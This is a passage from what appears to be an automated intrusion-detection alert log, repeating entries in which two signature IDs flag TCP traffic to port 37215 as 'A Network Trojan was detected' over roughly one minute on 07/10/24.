                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.545606
                  SID:2829579
                  Source Port:35010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404478
                  SID:2829579
                  Source Port:59888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290152
                  SID:2829579
                  Source Port:41016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238192
                  SID:2835222
                  Source Port:46754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.842336
                  SID:2835222
                  Source Port:44666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.801295
                  SID:2829579
                  Source Port:47056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.836737
                  SID:2835222
                  Source Port:48210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.682326
                  SID:2835222
                  Source Port:59276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.797142
                  SID:2829579
                  Source Port:47860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129654
                  SID:2829579
                  Source Port:57526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905026
                  SID:2829579
                  Source Port:46598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.042445
                  SID:2829579
                  Source Port:50474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2835222
                  Source Port:36326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.021892
                  SID:2835222
                  Source Port:37338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.244914
                  SID:2829579
                  Source Port:60316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423950
                  SID:2835222
                  Source Port:34438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2829579
                  Source Port:36738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.186644
                  SID:2829579
                  Source Port:52140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.601357
                  SID:2835222
                  Source Port:46942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128612
                  SID:2829579
                  Source Port:40440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.010263
                  SID:2835222
                  Source Port:53018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.156956
                  SID:2829579
                  Source Port:43948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.775868
                  SID:2829579
                  Source Port:40100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.766220
                  SID:2829579
                  Source Port:53490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596367
                  SID:2829579
                  Source Port:37806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.972304
                  SID:2829579
                  Source Port:60388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.852897
                  SID:2835222
                  Source Port:53996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.085141
                  SID:2835222
                  Source Port:43952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429020
                  SID:2829579
                  Source Port:57348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.609445
                  SID:2835222
                  Source Port:59990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.501206
                  SID:2829579
                  Source Port:46282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.329520
                  SID:2829579
                  Source Port:51212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2829579
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.478672
                  SID:2829579
                  Source Port:50906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.923569
                  SID:2835222
                  Source Port:60344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2835222
                  Source Port:40698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.668862
                  SID:2835222
                  Source Port:41246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383825
                  SID:2829579
                  Source Port:57576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012833
                  SID:2829579
                  Source Port:39320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881343
                  SID:2829579
                  Source Port:37348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.523308
                  SID:2835222
                  Source Port:42446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.939159
                  SID:2835222
                  Source Port:44388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.145981
                  SID:2829579
                  Source Port:44292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.578603
                  SID:2835222
                  Source Port:47604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2829579
                  Source Port:59476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988172
                  SID:2835222
                  Source Port:38252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.405669
                  SID:2829579
                  Source Port:38728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.548038
                  SID:2829579
                  Source Port:50750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126836
                  SID:2829579
                  Source Port:39314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.005959
                  SID:2835222
                  Source Port:48558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.322147
                  SID:2835222
                  Source Port:54268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.932047
                  SID:2835222
                  Source Port:51194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.754764
                  SID:2835222
                  Source Port:42642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.020494
                  SID:2829579
                  Source Port:60930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.383706
                  SID:2829579
                  Source Port:39400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.055063
                  SID:2829579
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917570
                  SID:2829579
                  Source Port:59726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569394
                  SID:2835222
                  Source Port:47070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.794005
                  SID:2829579
                  Source Port:34856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.969206
                  SID:2829579
                  Source Port:54956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.494437
                  SID:2835222
                  Source Port:38604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639022
                  SID:2829579
                  Source Port:52568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.076918
                  SID:2829579
                  Source Port:35126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.966412
                  SID:2835222
                  Source Port:37842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.614233
                  SID:2829579
                  Source Port:34734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.191849
                  SID:2829579
                  Source Port:55592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.004121
                  SID:2829579
                  Source Port:48308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681419
                  SID:2829579
                  Source Port:48698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824785
                  SID:2835222
                  Source Port:46320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.791682
                  SID:2835222
                  Source Port:47770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.866986
                  SID:2835222
                  Source Port:60436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.453868
                  SID:2829579
                  Source Port:50416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.000984
                  SID:2835222
                  Source Port:36182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.878785
                  SID:2835222
                  Source Port:56054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.595538
                  SID:2829579
                  Source Port:33394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.733003
                  SID:2829579
                  Source Port:34866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721349
                  SID:2829579
                  Source Port:44296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.703555
                  SID:2829579
                  Source Port:60512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.524985
                  SID:2829579
                  Source Port:39002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.918741
                  SID:2835222
                  Source Port:39584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.087236
                  SID:2829579
                  Source Port:44496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.964931
                  SID:2829579
                  Source Port:49066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.050509
                  SID:2835222
                  Source Port:44672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.435676
                  SID:2829579
                  Source Port:53776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.376307
                  SID:2829579
                  Source Port:49176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.726591
                  SID:2829579
                  Source Port:60726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.443855
                  SID:2835222
                  Source Port:56874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.873682
                  SID:2829579
                  Source Port:52834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389175
                  SID:2835222
                  Source Port:43242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.945203
                  SID:2835222
                  Source Port:46000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.321754
                  SID:2829579
                  Source Port:55922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.560013
                  SID:2835222
                  Source Port:35732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867297
                  SID:2835222
                  Source Port:35034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175593
                  SID:2835222
                  Source Port:44898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.301587
                  SID:2835222
                  Source Port:51700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.938789
                  SID:2835222
                  Source Port:51752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.882807
                  SID:2835222
                  Source Port:32800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132092
                  SID:2835222
                  Source Port:59698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.501206
                  SID:2829579
                  Source Port:36432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.176509
                  SID:2829579
                  Source Port:55890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.548975
                  SID:2835222
                  Source Port:56490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.128256
                  SID:2835222
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.926715
                  SID:2829579
                  Source Port:41270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415966
                  SID:2829579
                  Source Port:56490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.482913
                  SID:2835222
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.440414
                  SID:2835222
                  Source Port:36616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.096312
                  SID:2835222
                  Source Port:38452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.140373
                  SID:2829579
                  Source Port:43590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.294435
                  SID:2829579
                  Source Port:52660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634541
                  SID:2835222
                  Source Port:41060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.597110
                  SID:2835222
                  Source Port:45958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.615687
                  SID:2835222
                  Source Port:55098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297674
                  SID:2829579
                  Source Port:57202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260584
                  SID:2829579
                  Source Port:38936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.154328
                  SID:2835222
                  Source Port:33004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.265818
                  SID:2835222
                  Source Port:47366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.944917
                  SID:2835222
                  Source Port:39158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.710026
                  SID:2835222
                  Source Port:42870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.817942
                  SID:2835222
                  Source Port:53940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.600556
                  SID:2835222
                  Source Port:58142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2835222
                  Source Port:32938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.161744
                  SID:2829579
                  Source Port:48730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148495
                  SID:2835222
                  Source Port:55360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596849
                  SID:2835222
                  Source Port:59642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.452655
                  SID:2835222
                  Source Port:60584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.020001
                  SID:2829579
                  Source Port:55226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.591904
                  SID:2829579
                  Source Port:44222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.529678
                  SID:2829579
                  Source Port:33092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.806534
                  SID:2829579
                  Source Port:43638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.852225
                  SID:2835222
                  Source Port:50390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404478
                  SID:2829579
                  Source Port:56308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.453359
                  SID:2829579
                  Source Port:60670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.237344
                  SID:2829579
                  Source Port:53382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.165821
                  SID:2829579
                  Source Port:43764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182553
                  SID:2829579
                  Source Port:60102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.919816
                  SID:2835222
                  Source Port:59266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2829579
                  Source Port:35304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2829579
                  Source Port:35834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.921698
                  SID:2829579
                  Source Port:58804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.988744
                  SID:2829579
                  Source Port:58686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.856770
                  SID:2835222
                  Source Port:37122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854802
                  SID:2829579
                  Source Port:35264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588722
                  SID:2829579
                  Source Port:44220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.868909
                  SID:2835222
                  Source Port:42260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.438982
                  SID:2835222
                  Source Port:53354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.583365
                  SID:2835222
                  Source Port:58974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.121725
                  SID:2829579
                  Source Port:41342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.665710
                  SID:2835222
                  Source Port:32986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.953196
                  SID:2829579
                  Source Port:59958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802852
                  SID:2829579
                  Source Port:43794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479455
                  SID:2835222
                  Source Port:44348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.588414
                  SID:2829579
                  Source Port:47106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912648
                  SID:2835222
                  Source Port:50262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.385136
                  SID:2835222
                  Source Port:59974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.383706
                  SID:2829579
                  Source Port:56316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639081
                  SID:2835222
                  Source Port:33718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.414315
                  SID:2835222
                  Source Port:51814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809850
                  SID:2829579
                  Source Port:56086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.846207
                  SID:2835222
                  Source Port:59538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.173091
                  SID:2829579
                  Source Port:50258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.934351
                  SID:2835222
                  Source Port:43832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.137438
                  SID:2829579
                  Source Port:52092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860875
                  SID:2835222
                  Source Port:46238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.852572
                  SID:2835222
                  Source Port:53546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.807357
                  SID:2835222
                  Source Port:55458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397388
                  SID:2835222
                  Source Port:37722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.647233
                  SID:2835222
                  Source Port:54280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.914738
                  SID:2829579
                  Source Port:58280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2829579
                  Source Port:56120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.894424
                  SID:2835222
                  Source Port:58264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000365
                  SID:2835222
                  Source Port:47364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.606854
                  SID:2835222
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.926715
                  SID:2829579
                  Source Port:34732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037951
                  SID:2829579
                  Source Port:44806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318438
                  SID:2829579
                  Source Port:45276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2835222
                  Source Port:46470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.436207
                  SID:2835222
                  Source Port:41784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.517420
                  SID:2835222
                  Source Port:37024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.222865
                  SID:2835222
                  Source Port:38458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.876796
                  SID:2829579
                  Source Port:34080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.886459
                  SID:2835222
                  Source Port:53418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.260119
                  SID:2829579
                  Source Port:49376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.692447
                  SID:2829579
                  Source Port:35282
